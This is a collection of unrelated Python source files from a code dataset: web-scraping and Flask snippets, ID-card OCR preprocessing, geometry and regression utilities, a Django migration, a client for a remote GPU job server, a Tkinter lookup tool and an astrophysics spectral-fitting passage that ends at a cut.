{"seq_id":"90079428","text":"'''import requests\nfrom bs4 import BeautifulSoup as BS\n\npage=requests.get('7-5.html')\nres=BS(page.text,'lxml')\n#print(res)\n#list = res.find('div', class_='container')\nlist1=res.findAll('div', class_='course')\nprint(len(list1))'''\n\n\n'''\nWe saved a Wikipedia page about programming languages at\nhttps://stepik.org/media/attachments/lesson/209717/1.html\n\nDownload it with a Python script and count which language is mentioned more\noften: Python or C++ (the answer must be one of these two strings).\nYou only need to count occurrences of the word Python or C++ as a substring.\n'''\n\na=open('7-5.html','r',encoding='utf8')\ncnt_python=0\ncnt_cpp=0\nfor line in a:\n    cnt_python+=line.count('Python')\n    cnt_cpp+=line.count('C++')\nprint('Python') if cnt_cpp < cnt_python else print('C++')\n#def allowed_file(filename):\n#\treturn '.'in filename and filename.rsplit('.',1)[1] in ALLOWED_EXTENSIONS\n#db.create_all()\n#qq=mem('swpd','free','buff')\n#db.session.add(qq)\n#db.session.commit()\ndb.create_all()\n@app.route('/',methods=['GET','POST'])\ndef upload_file():\n\tif request.method=='POST':\n\t\tfile1=request.files['file']\n\t\tsource1=json.load(file1)\n#\t\tif qq :\n#\t\t\tdb.session.delete(qq)\n#\t\t\tdb.session.commit()\n#\t\tdb.create_all()\n\t\tqq=mem(source1['swpd'],source1['free'],source1['buff'])\n\t\tdb.session.add(qq)\n\t\tdb.session.commit()\n@app.route('/show_data')\ndef show_data():\n\tmem_show=mem.query.filter_by(id=1).first()\n\tcom1=mem_show.swpd\n\tcom2=mem_show.free\n\tcom3=mem_show.buff\n\treturn render_template('show_data.html',com1=com1,com2=com2,com3=com3)\n\n#\t\tif file1 and allowed_file(file1.filename):\n#\t\t\tfilename =secure_filename(file1.filename)\n#\t\t\tfile1.save(os.path.join(app.config['UPLOAD_FOLDER'],filename))\n#\n#\t\t\tsource1=json.load(file1)\n#\t\t\tdb.create_all()\n#\t\t\tqq=mem(source1['swpd'],source1['free'],source1['buff'])\n#\t\t\tdb.session.add(qq)\n#\t\t\tdb.session.commit()\n#\t\t\treturn redirect(url_for('uploaded_file',filename=filename))\n#\t\telse:\n#\t\t\treturn \"no exit\"\n#\treturn '''\n#\t<!doctype html>\n#\t<title>Upload new File</title>\n#\t<h1>Upload new File</h1>\n#\t<form method=post enctype=multipart/form-data>\n#\t  <p><input type=file name=file>\n#\t     <input type=submit value=Upload>\n#\t</form>
    \n#\t'''\n#@app.route('/uploads/')\n#def uploaded_file(filename):\n#\treturn send_from_directory(app.config['UPLOAD_FOLDER'],filename)\nif __name__=='__main__':\n\tapp.run()\n","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"541053608","text":"from __future__ import division, print_function, unicode_literals\nimport cv2\nimport numpy as np\n\n\nNORM_SIZE = (1100, 800)\nMERGE_SIZE = (700, 530)\n# ID number field\nNUM_FIELD = np.array([[450, 210], [920, 270]], dtype='int')\nNUM_TITLE = np.array([[0, 0], [70, 60]], dtype='int')\n# Name field\nNAME_FIELD = np.array([[340, 280], [1040, 420]], dtype='int')\nNAME_TITLE = np.array([[0, 0], [120, 70]], dtype='int')\n# Date of birth field\nDOB_FIELD = np.array([[340, 420], [1040, 490]], dtype='int')\nDOB_TITLE = np.array([[0, 0], [180, 70]], dtype='int')\n# Birth place field\nBPLACE_FIELD = np.array([[340, 490], [1040, 625]], dtype='int')\nBPLACE_TITLE = np.array([[0, 0], [230, 60]], dtype='int')\n# Current living place field\nCPLACE_FIELD = np.array([[340, 625], [1040, 755]], dtype='int')\nCPLACE_TITLE = np.array([[0, 0], [340, 60]], dtype='int')\n\nTEXT_MIN_WIDTH = 5\nTEXT_MIN_HEIGHT = 20\n\n\nclass Span():\n\tdef __init__(self, x0, y0, img):\n\t\tself.x0 = x0\n\t\tself.y0 = y0\n\t\tself.image = img\n\n\t\tself.segcols = None # segmentation columns in ground truth\n\t\tself.predict_segments = None # predicted segmentation columns\n\t\tself.refine_segments = None # refined segmentation columns (2-means clustering)\n\t\tself.predict_characters = None # predicted character list\n\n\nclass Field():\n\tdef __init__(self, img, name):\n\t\tself.image = img\n\t\tself.name = name\n\n\t\tself.spans = [] # list of Spans\n\t\t\n\t\tself.postprocessed_text = None # text in field, post-processed\n\n\tdef get_raw_text(self):\n\t\ttext = '\\n'.join([''.join([c for c in s.predict_characters]) for s in self.spans])\n\t\treturn text\n\n\tdef hide_title(self, title):\n\t\tself.image[title[0][1]:title[1][1], title[0][0]:title[1][0]] = 255\n\n\tdef find_text_spans(self):\n\t\timg_b = self.image[:, :, 0]\n\t\timg_g = self.image[:, :, 1]\n\n\t\tidx_black = np.bitwise_and(img_b < 170, img_g < 170) # DOF\n\n\t\tthresh = np.ones_like(self.image) * 255\n\t\tthresh = cv2.cvtColor(thresh, cv2.COLOR_BGR2GRAY)\n\t\tthresh[idx_black] = 0\n\n\t\tkernel1 = np.ones((3,1), np.uint8) # DOF\n\t\tkernel2 = np.ones((1,3), np.uint8) # DOF\n\t\t\n\t\thorizontal = cv2.erode(thresh, kernel1, iterations=1)\n\t\thorizontal = cv2.dilate(horizontal, kernel2, iterations=4)\n\n\t\tvertical = cv2.erode(thresh, kernel2, iterations=1)\n\t\tvertical = cv2.dilate(vertical, kernel1, iterations=4)\n\n\t\tthresh = np.minimum(horizontal, vertical)\n\n\t\tkernel3 = np.ones((1,5), np.uint8)\n\t\tthresh = cv2.erode(thresh, kernel3, iterations=10)\n\n\t\tbig_boxes = self._get_contour_boxes(thresh)\n\n\t\tfor b in big_boxes:\n\t\t\tx0, y0, w, h = b\n\t\t\ty0 = max(0, y0-10)\n\t\t\th = min(self.image.shape[0], y0+h+20)\n\t\t\timg = self.image[y0:h, x0:x0+w]\n\t\t\tself.spans.append(Span(x0, y0, img))\n\n\tdef _get_contour_boxes(self, img):\n\t\tmask = cv2.bitwise_not(img)\n\t\t\n\t\tif cv2.__version__[0] == '3':\n\t\t\t_, contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\t\telse:\n\t\t\tcontours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n\t\tcontour_big_boxes = []\n\t\tfor contour in contours:\n\t\t\trect = 
cv2.boundingRect(contour)\n\t\t\t_, ymin, width, height = rect\n\n\t\t\tif (width < TEXT_MIN_WIDTH or height < TEXT_MIN_HEIGHT):\n\t\t\t\tcontinue\n\n\t\t\tpos = 0\n\t\t\twhile contour_big_boxes and contour_big_boxes[pos][1] < ymin:\n\t\t\t\tpos += 1\n\t\t\tcontour_big_boxes.insert(pos, rect)\n\n\t\treturn contour_big_boxes\n\n\nclass Image():\n\tdef __init__(self, img, name=None):\n\t\tself.image = cv2.resize(img, dsize=NORM_SIZE, interpolation=cv2.INTER_CUBIC)\n\n\t\tif name:\n\t\t\tself.base = name.split('.')[0]\n\t\t\tself.extension = name.split('.')[1]\n\n\t\tself.fields = self._get_fields() # list of infor fields\n\t\tfor f in self.fields:\n\t\t\tf.find_text_spans()\n\n\tdef merge_fields(self):\n\t\t# merge 5 information fields (images) into one image to be recognized\n\t\tpadding = 20\n\t\tmerged_img = np.ones((MERGE_SIZE[1]+padding*2, MERGE_SIZE[0]+padding*2), dtype=\"uint8\") * 255\n\t\tcur_y = padding\n\t\tcur_x = padding\n\n\t\tmerged_img = cv2.cvtColor(merged_img, cv2.COLOR_GRAY2RGB)\n\n\t\tfor f in self.fields:\n\t\t\theight, width = f.image.shape[:2]\n\t\t\tmerged_img[cur_y:cur_y+height, cur_x:cur_x+width] = f.image\n\t\t\tcur_y += height\n\t\treturn merged_img\n\n\tdef _get_fields(self):\n\t\t# return all 5 information fields as 5 independent images\n\t\tnum = Field(img=self.image[NUM_FIELD[0][1]:NUM_FIELD[1][1], NUM_FIELD[0][0]:NUM_FIELD[1][0]], name='num')\n\t\tnum.hide_title(NUM_TITLE)\n\n\t\tname = Field(img=self.image[NAME_FIELD[0][1]:NAME_FIELD[1][1], NAME_FIELD[0][0]:NAME_FIELD[1][0]], name='name')\n\t\tname.hide_title(NAME_TITLE)\n\n\t\tdob = Field(img=self.image[DOB_FIELD[0][1]:DOB_FIELD[1][1], DOB_FIELD[0][0]:DOB_FIELD[1][0]], name='dob')\n\t\tdob.hide_title(DOB_TITLE)\n\n\t\tbplace = Field(img=self.image[BPLACE_FIELD[0][1]:BPLACE_FIELD[1][1], BPLACE_FIELD[0][0]:BPLACE_FIELD[1][0]], name='bplace')\n\t\tbplace.hide_title(BPLACE_TITLE)\n\n\t\tcplace = Field(img=self.image[CPLACE_FIELD[0][1]:CPLACE_FIELD[1][1], CPLACE_FIELD[0][0]:CPLACE_FIELD[1][0]], name='cplace')\n\t\tcplace.hide_title(CPLACE_TITLE)\n\n\t\tfields = [num, name, dob, bplace, cplace]\n\t\treturn fields\n","sub_path":"IdRecDemo/idocr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"10322590","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 23 01:01:53 2021\r\n\r\n@author: vikal\r\n\"\"\"\r\n\r\nPI = 3.141592653589793238\r\n\r\n\r\ndef mulai():\r\n while True:\r\n masuk = input(\"\\nElemenkompetensi berapa?: \")\r\n if masuk == \"1\":\r\n elemenkompetensi1()\r\n elif masuk == \"2\":\r\n elemenkompetensi2()\r\n elif masuk == \"e\":\r\n break\r\n else:\r\n print(\"Pilih 1 atau 2, e untuk keluar\\n\")\r\n\r\n\r\ndef elemenkompetensi1():\r\n print(\"MENGHITUNG KECEPATAN AKHIR GLBB (diketahui jarak tempuh)\")\r\n v0 = int(input(\"Masukkan v0: \"))\r\n a = int(input(\"Masukkan a: \"))\r\n s = int(input(\"Masukkan s: \"))\r\n\r\n def vt(kec_awal, percepatan, jarak):\r\n return (kec_awal ** 2 + (2 * percepatan * jarak)) ** (1 / 2)\r\n\r\n vt = vt(v0, a, s)\r\n\r\n print(\"Jarak tempuh jika kecepatan awal:\", v0, \"percepatan:\", a, \"dan jarak tempuh:\", s, \"adalah:\", vt)\r\n\r\n\r\ndef elemenkompetensi2():\r\n def kubus():\r\n masuk = int(input(\"Masukkan nilai rusuk: \"))\r\n print(\"Luas permukaan kubus dengan rusuk\", masuk, \"adalah\", hitung_kubus(masuk), \"\\n\")\r\n\r\n def hitung_kubus(rusuk):\r\n return rusuk ** 2 * 6\r\n\r\n def balok():\r\n masuk1, 
masuk2, masuk3 = int(input(\"Masukkan nilai panjang: \")), int(input(\"Masukkan nilai lebar: \")), int(\r\n input(\"Masukkan nilai tinggi: \"))\r\n print(\"Luas permukaan balok dengan panjang {}, lebar {} dan tinggi {} \" \"adalah\".format(masuk1, masuk2, masuk3),\r\n hitung_balok(masuk1, masuk2, masuk3), \"\\n\")\r\n\r\n def hitung_balok(panjang, lebar, tinggi):\r\n return panjang * tinggi * 2 + panjang * lebar * 2 + tinggi * lebar * 2\r\n\r\n def tabung():\r\n masuk1, masuk2 = int(input(\"Masukkan nilai jari-jari: \")), int(input(\"Masukkan nilai tinggi: \"))\r\n print(\"Luas permukaan tabung dengan jari-jari {} dan tinggi {} \" \"adalah\".format(masuk1, masuk2),\r\n hitung_tabung(masuk1, masuk2, PI), \"\\n\")\r\n\r\n def hitung_tabung(jari2, tinggi, pi):\r\n return 2 * pi * jari2 * (tinggi + jari2)\r\n\r\n def kerucut():\r\n masuk1, masuk2 = int(input(\"Masukkan nilai jari-jari: \")), int(input(\"Masukkan nilai garis lukis: \"))\r\n print(\"Luas permukaan kerucut dengan jari-jari {} dan garis lukis {} \" \"adalah\".format(masuk1, masuk2),\r\n hitung_kerucut(masuk1, masuk2, PI), \"\\n\")\r\n\r\n def hitung_kerucut(jari2, garis_lukis, pi):\r\n return pi * jari2 ** 2 + pi * jari2 * garis_lukis\r\n\r\n def bola():\r\n masuk1 = int(input(\"Masukkan nilai jari-jari: \"))\r\n print(\"Luas permukaan bola dengan jari-jari {} \" \"adalah\".format(masuk1), hitung_bola(masuk1, PI), \"\\n\")\r\n\r\n def hitung_bola(jari2, pi):\r\n return 4 * pi * (jari2 * jari2)\r\n\r\n while True:\r\n print(\"KALKULATOR LUAS PERMUKAAN BANGUN RUANG\\n1. Kubus\\n2. Balok\\n3. Tabung\\n4. Kerucut\\n5. Bola\\n6. Exit\")\r\n pilihan = input(\"Pilih menu yang tersedia: \")\r\n if pilihan == \"1\":\r\n kubus()\r\n elif pilihan == \"2\":\r\n balok()\r\n elif pilihan == \"3\":\r\n tabung()\r\n elif pilihan == \"4\":\r\n kerucut()\r\n elif pilihan == \"5\":\r\n bola()\r\n elif pilihan == \"6\":\r\n print(\"TERIMA KASIH!\")\r\n break\r\n else:\r\n print(\"Pilih 1, 2, 3, 4 atau 5, e untuk keluar\\n\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n mulai()","sub_path":"Laprakalgo6.py","file_name":"Laprakalgo6.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"373995502","text":"import numpy as np\n\n\nclass Model:\n\t\"\"\"\n\tLinear regression model that predicts output given an input example\n\t\"\"\"\n\tparameters = None\n\n\tdef __init__(self, parameters: np.ndarray):\n\t\t\"\"\"\n\t\tCreates model with given parameters\n\n\t\tparameters: weights for model\n\t\t\"\"\"\n\n\t\tself.parameters = parameters\n\n\tdef predict(self, input_example: np.ndarray):\n\t\t\"\"\"\n\t\tPredicts output value of given example\n\n\t\tinput_example: example to predict\n\t\t\"\"\"\n\t\tassert input_example.shape[0] == 1, \"Example can only contain one row\"\n\t\tassert input_example.shape[1] + 1 == self.parameters.shape[0], f\"Example does not match dimension of model's parameters.\\nInput features: {input_example}\\nParameters (not including bias): {self.parameters}\"\n\n\t\tinput_example = np.hstack((np.ones(shape = (1, 1)), input_example))\n\n\t\tprediction = np.dot(input_example, self.parameters)[0,0]\n\t\tprint(f\"Prediction: {prediction}\\n\")\n\t\treturn np.dot(input_example, self.parameters)[0,0]\n\ndef compute_cost(input_data, output_data, weights, reg_const):\n\t\"\"\"\n\tComputes cost function\n\n\tinput_data: m x n matrix of input data, including bias term\n\toutput_data: m x 1 matrix of correct output data\n\tweights: proposed model to 
predict output_data from input_data\n\treg_const: regularization constant\n\t\"\"\"\n\tweight_cost = np.sum((np.dot(input_data, weights) - output_data) ** 2)\n\n\treg_term = np.abs(weights) * reg_const\n\treg_term[0,0] = 0\n\treg_term = np.sum(reg_term)\n\n\treturn (1.0 / (input_data.shape[0])) * (weight_cost + reg_term)\n\ndef optimize_weights(input_data, output_data, weights, learning_rate, reg_const, acceptable_error):\n\t\"\"\"\n\tUses gradient descent to optimize weights\n\n\tinput_data: m x n matrix of input data, including bias term\n\toutput_data: m x 1 matrix of correct output data\n\tweights: proposed model to predict output_data from input_data\n\tlearning_rate: rate of gradient descent\n\treg_const: regularization constant\n\tacceptable_error: cost value at which gradient descent terminates\n\t\"\"\"\n\tnum_examples = input_data.shape[0]\n\n\twhile compute_cost(input_data, output_data, weights, reg_const) > acceptable_error:\n\t\treg_term = (reg_const / num_examples) * weights\n\t\treg_term[0,0] = 0\n\t\tupdate_term = (1.0 / num_examples) * np.dot(input_data.T, (np.dot(input_data, weights) - output_data)) + reg_term\n\t\tweights -= learning_rate * update_term\n\t\n\tprint(f\"Final mean-squared error: {compute_cost(input_data, output_data, weights, reg_const)}\")\n\tprint(f\"Finals weights:\\n{weights}\\n\")\n\treturn weights\n\ndef train_model(input_data: np.ndarray, output_data: np.ndarray, learning_rate = 0.01, reg_const = 0, acceptable_error = None) -> np.ndarray:\n\t\"\"\"\n\tTrains a linear regression model based on training data and returns model\n\n\tinput_data: m x n matrix of input data\n\toutput_data: m x 1 matrix output data\n\tlearning_rate: rate of convergence\n\tacceptable_error: highest possible error at which training can terminate\n\t\"\"\"\n\tassert isinstance(input_data, np.ndarray), \"Input training data must be a numpy ndarray\"\n\tassert isinstance(output_data, np.ndarray), \"Output training data must be a numpy ndarray\"\n\tassert input_data.shape[0] == output_data.shape[0], f\"Input training data count must match output training data count.\\nNumber of input training data examples: {input.shape[0]}\\nNumber of output training data examples: {output.shape[0]}\"\n\n\tif acceptable_error is None:\n\t\tacceptable_error = 10 ** (int(np.log10(np.mean(output_data))) - 3)\t#Default error set to 3 orders of magnitude below average output value\n\n\tnum_examples, num_features = input_data.shape[0], input_data.shape[1] + 1\t#Records number of training examples and number of features for each training example\n\n\tinput_data = np.hstack((np.ones(shape = (num_examples, 1)), input_data))\t#Adds bias term to input data\n\t\n\treturn Model(optimize_weights(input_data, output_data, np.zeros(shape = (num_features, 1)), learning_rate, reg_const, acceptable_error))\n\n","sub_path":"linearregression/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"363310150","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('books', '0016_auto_20160314_1432'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='donation',\n name='donation_date',\n field=models.DateField(help_text='The date on which the donation was made. 
Best guess if exact date not known.', default=datetime.date.today),\n ),\n migrations.AlterField(\n model_name='expenseclaim',\n name='claim_date',\n field=models.DateField(help_text='The date on which the claim was filed. Best guess if exact date not known.', default=datetime.date.today),\n ),\n migrations.AlterField(\n model_name='sale',\n name='sale_date',\n field=models.DateField(help_text='The date on which the sale was made. Best guess if exact date not known.', default=datetime.date.today),\n ),\n ]\n","sub_path":"books/migrations/0017_auto_20160316_1250.py","file_name":"0017_auto_20160316_1250.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"229563174","text":"from collections import Counter\nfrom math import factorial\n\ndef comb(n,r):\n return factorial(n)//factorial(r)//factorial(n-r)\n\nN,A,B = map(int,input().split())\nV=list(map(int,input().split()))\n\nV_C=Counter(V)\n\nmax_val=max(V)\nCC=V_C[max_val]\nif A<=CC:\n ans=0\n for v in range(A,min(B,CC)+1):\n ans+=comb(CC,v)\n print(max_val)\n print(ans)\n exit()\n\ntmp_sum=0\ntmp_num=0\n\nfor key in sorted(V_C.keys(),reverse=True):\n val = V_C[key]\n #追加しても大丈夫なら加える(加えないとAに行かないから加えないといけない)\n #ぎりAに届くように追加するのが良い\n if A<=tmp_num+val:\n rest=A-tmp_num\n\n tmp_num+=rest\n tmp_sum+=key*rest\n print(tmp_sum/tmp_num)\n print(comb(val,rest))\n exit()\n else:\n tmp_num+=val\n tmp_sum+=key*val\n","sub_path":"Python_codes/p03776/s077898730.py","file_name":"s077898730.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"586667221","text":"\nimport requests\nfrom websocket import create_connection\nimport time\nfrom requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor\nimport json\nimport dill\nimport os\nfrom tqdm import tqdm\nimport sys\nfrom .dummies import import_all, unimport_all\n\n\ndef status_check(res):\n if res.status_code != 200:\n raise ValueError(res.text)\n\nclass ServerConnector():\n\n def __init__(self, username, instanceType):\n self.GPU_SERVER_PORT = '8000'\n self.username = username\n self.type = instanceType\n if instanceType == 'local':\n self.CATALEARN_URL = 'localhost:8080'\n else:\n self.CATALEARN_URL = 'catalearn.com'\n\n # def verify_key(self, key):\n # r = requests.post(\n # 'http://{}/api/admin/verifyKey'.format(self.CATALEARN_URL))\n # status_check(r)\n # res = r.json()\n # if 'err' in res:\n # print(res['err'])\n # return False\n # else:\n # return True\n\n def contact_server(self):\n\n r = requests.post('http://{}/api/gpu/checkAvailability'.format(self.CATALEARN_URL),\n data={'username': self.username,\n 'type': self.type})\n status_check(r)\n res = r.json()\n\n self.jobHash = res['jobHash']\n idle = res['idle']\n instanceId = res['instanceId']\n if not idle:\n print(\"Starting server, this will take about 3 minutes\")\n while True:\n r = requests.post('http://{}/api/gpu/checkStatus'.format(self.CATALEARN_URL),\n data={'instanceId': instanceId})\n status_check(r)\n res = r.json()\n if res['started']:\n break\n time.sleep(3)\n print('.', end='')\n print()\n\n r = requests.post('http://{}/api/gpu/runJob'.format(self.CATALEARN_URL),\n data={'hash': self.jobHash})\n status_check(r)\n res = r.json()\n gpu_hash = res['hash']\n gpu_ip = res['ip']\n ws_port = res['ws_port']\n return (gpu_hash, gpu_ip, ws_port)\n\n def upload_params_decorator(self, gpu_ip, job_hash):\n url = 'http://{}:{}/runJobDecorator'.format(\n 
gpu_ip, self.GPU_SERVER_PORT)  # only two placeholders in the URL; job_hash is uploaded separately below\n        self.upload_params(url, job_hash)\n\n    def upload_params_magic(self, gpu_ip, job_hash):\n        url = 'http://{}:{}/runJobMagic'.format(\n            gpu_ip, self.GPU_SERVER_PORT)\n        self.upload_params(url, job_hash)\n\n    def upload_params(self, url, job_hash):\n        print(\"Uploading data\")\n        time.sleep(0.5)\n        file_size = os.path.getsize('uploads.pkl')\n\n        pbar = tqdm(total=file_size, unit='B', unit_scale=True)\n\n        def callback(monitor):\n            progress = monitor.bytes_read - callback.last_bytes_read\n            pbar.update(progress)\n            callback.last_bytes_read = monitor.bytes_read\n        callback.last_bytes_read = 0\n\n        with open('uploads.pkl', 'rb') as pickle_file:\n            data = {\n                'file': ('uploads.pkl', pickle_file, 'application/octet-stream'),\n                'hash': job_hash\n            }\n            encoder = MultipartEncoder(\n                fields=data\n            )\n            monitor = MultipartEncoderMonitor(encoder, callback)\n            r = requests.post(url, data=monitor, headers={\n                'Content-Type': monitor.content_type})\n            pbar.close()\n        status_check(r)\n\n    def stream_output(self, gpu_ip, gpu_hash, ws_port):\n\n        gpuUrl = 'ws://{}:{}'.format(gpu_ip, ws_port)\n\n        ws = create_connection(gpuUrl)\n\n        outUrl = None\n        ws.send(gpu_hash)\n        try:\n            while True:\n                message = ws.recv()\n                msgJson = json.loads(message)\n                if 'end' in msgJson:\n                    if 'downloadUrl' in msgJson:\n                        outUrl = msgJson['downloadUrl']\n                    else:\n                        outUrl = None\n                    ws.close()\n                    break\n                else:\n                    print(msgJson['message'], end='')\n            return outUrl\n        except KeyboardInterrupt:\n            print('\\nJob interrupted')\n            ws.close()\n\n    def get_return_object(self, outUrl):\n\n        print(\"Downloading result\")\n\n        r = requests.post(outUrl, data={'hash' : self.jobHash}, stream=True)\n        status_check(r)\n        total_size = int(r.headers.get('content-length', 0))\n        with open('return.pkl', 'wb') as f:\n            pbar = tqdm(total=total_size, unit='B', unit_scale=True)\n            chunk_size = 32768\n            for data in r.iter_content(chunk_size):\n                f.write(data)\n                pbar.update(chunk_size)\n            pbar.close()\n\n        with open('return.pkl', \"rb\") as f:\n\n            # import_all() # Hack: a workaround for dill's pickling problem\n            result = dill.load(f)\n            # unimport_all()\n            if result is None:\n                print('Computation failed')\n        print(\"Done!\")\n        return result\n","sub_path":"catalearn/server_connector.py","file_name":"server_connector.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"502661229","text":"import re\nimport tkinter as tk\n\nFONT = ('times', 14, 'bold')\n\ndef find(string):\n    pattern = r'(?<=ID=)[0-9]+(?=&)'\n    try:\n        return re.search(pattern, string).group(0)\n    except AttributeError:  # re.search() returned None, so .group() failed\n        return 'Wrong input format!'\n\nclass SimpleGui(tk.Frame):\n    def __init__(self, parent=None, *args, **kargs):\n        tk.Frame.__init__(self, parent, *args, **kargs)\n        self.master.title('Task ID lookup')\n        self.pack(expand='yes', fill='both')\n        self.makewidgets()\n        self.tempstore=['', '']\n    def makewidgets(self):\n        top = tk.Frame(self)\n        top.pack(side='top', expand='yes', fill='both')\n        mid = tk.Frame(self)\n        mid.pack(side='left', fill='x')\n        bottom = tk.Frame(self)\n        bottom.pack(side='right', expand='yes', fill='x')\n        self.txt = tk.Text(top, relief='sunken')\n        self.txt.bind('<Return>', self.find)\n        self.txt.pack(expand='yes', fill='both')\n        button_find = tk.Button(mid, text='ID find', command=lambda: self.find(None), height=3, width=30)  # find() expects an event argument\n        button_find.pack(side='left')\n        button_delete = tk.Button(mid, text='Delete', command=lambda:self.txt.delete('1.0', 'end'), height=3, width=30)\n        button_delete.pack(side='left')\n        
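# Illustrative check of the module-level find() helper above (added note;\n        # the sample URLs are hypothetical, not from the original script):\n        #     find('http://host/task?ID=12345&page=1')  ->  '12345'\n        #     find('no task id here')                   ->  'Wrong input format!'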
self.label_1 = tk.Label(bottom, font=FONT)\n self.label_1.pack(side='top', expand='yes')\n self.label_2 = tk.Label(bottom)\n self.label_2.pack(side='top', expand='yes')\n def find(self, event):\n string = self.txt.get('1.0', 'end-1c')\n if not string:\n self.tempstore[1] = self.tempstore[0]\n self.tempstore[0] = 'empty'\n self.label_1.config(text=self.tempstore[0])\n self.label_2.config(text=self.tempstore[1])\n self.tempstore[0] = 'Previous = ' + self.tempstore[0]\n else:\n store = find(string)\n self.tempstore[1] = self.tempstore[0]\n self.tempstore[0] = store\n self.label_1.config(text=self.tempstore[0])\n self.label_2.config(text=self.tempstore[1])\n self.tempstore[0] = 'Previous = ' + store\n\nSimpleGui().mainloop()\n","sub_path":"FID_gui.py","file_name":"FID_gui.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538726110","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 28 22:26:10 2017\n\n@author: JohannesMHeinrich\n\"\"\"\n\nfrom numpy import diff\n\n\ndx = 1.0\ny = [0,1,4,9,16,25]\ndy = diff(y)/dx\nprint(dy)\n\n\nprint('_______________________________')\n\n\n\ndef do_derivative(list_a,list_b):\n \n derivative_x = []\n derivative_y = []\n \n for i in range(len(list_a)-1):\n x_1 = float(list_a[i])\n x_2 = float(list_a[i+1])\n y_1 = float(list_b[i])\n y_2 = float(list_b[i+1])\n \n dy = (y_2 - y_1)\n dx = (x_2 - x_1)\n \n derivative_x.append(float(x_1 + dx/2.0))\n derivative_y.append(float(dy/dx))\n \n return derivative_x, derivative_y\n \n \n \n \n\nx_list = (-5,-4,-3,-2,-1,0,1,2,3,4,5)\ny_list = (25,16,9,4,1,0,1,4,9,16,25)\n\n\ntesta, testb = do_derivative(x_list,y_list)\n\nprint(testa)\nprint(testb)\n\n\n\n","sub_path":"untitled1.py","file_name":"untitled1.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"91095280","text":"import numpy as np\nimport pandas as pd\nfrom astropy.cosmology import FlatLambdaCDM\ncosmo = FlatLambdaCDM(H0=70, Om0=0.3)\nfrom astropy.cosmology import z_at_value\nimport fsps\nfrom matplotlib import gridspec\nfrom astropy.io import fits\nimport astropy.units as u\nfrom sim_engine import Scale_model\nfrom spec_tools import Source_present, Oldest_galaxy, Sig_int, Smooth, Rescale_sfh, \\\n lbt_to_z, boot_to_posterior, age_to_z, Posterior_spec\nfrom spec_stats import Smooth, Highest_density_region, Linear_fit\nfrom spec_id import *\nfrom spec_id_2d import Gen_temp_dict_addline\nfrom spec_stats import Highest_density_region, Linear_fit\nfrom spec_exam import Gen_spec\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d, interp2d\nfrom glob import glob\nimport seaborn as sea\nimport os\nfrom grizli import multifit\nfrom grizli import model\nfrom grizli.utils import SpectrumTemplate\nfrom sim_engine import forward_model_grism\n\nsea.set(style='white')\nsea.set(style='ticks')\nsea.set_style({'xtick.direct'\n 'ion': 'in','xtick.top':True,'xtick.minor.visible': True,\n 'ytick.direction': \"in\",'ytick.right': True,'ytick.minor.visible': True})\ncmap = sea.cubehelix_palette(12, start=2, rot=.2, dark=0, light=1.0, as_cmap=True)\n\n### set home for files\nhpath = os.environ['HOME'] + '/'\n\nif hpath == '/Users/Vince.ec/':\n dpath = '/Volumes/Vince_research/Data/' \n \nelse:\n dpath = hpath + 'Data/' \n \nadb = pd.read_pickle('../dataframes/fitdb/evolution_db.pkl')\nAdb = adb.query('AGN != \"AGN\" and lmass > 10 and concen < -0.4 and 0.7 < zgrism 
< 2.7')\n \nfrom spec_id import Calibrate_grism, Scale_model\ndef Best_fit_scale(wv, fl, er, mfl, p1):\n cal = Calibrate_grism([wv, fl, er], mfl, p1)\n scale = Scale_model(fl / cal, er/ cal, mfl)\n FL = fl/ cal/ scale\n ER = er/ cal/ scale\n return FL, ER\n\ndef Q_spec_adjust(Gs, bestfits):\n sp = fsps.StellarPopulation(zcontinuous = 1, logzsol = 0, sfh = 3, dust_type = 1)\n wvs, flxs, errs, beams, trans = Gather_grism_data_from_2d(Gs, sp)\n\n m, a, m1, m2, m3, m4, m5, m6, m7, m8, m9, m10, lm, z, d,\\\n bp1, rp1, ba, bb, bl, ra, rb, rl, lwa, logz= BFS\n\n sp.params['dust2'] = d\n sp.params['dust1'] = d\n sp.params['logzsol'] = np.log10(m)\n \n time, sfr, tmax = convert_sfh(get_agebins(a), [m1, m2, m3, m4, m5, m6, m7, m8, m9, m10], maxage = a*1E9)\n\n sp.set_tabular_sfh(time,sfr) \n\n wave, flux = sp.get_spectrum(tage = a, peraa = True)\n\n Gmfl, Pmfl = Full_forward_model(Gs, wave, F_lam_per_M(flux,wave*(1 + z), z, 0, sp.stellar_mass)*10**lm, z, \n wvs, 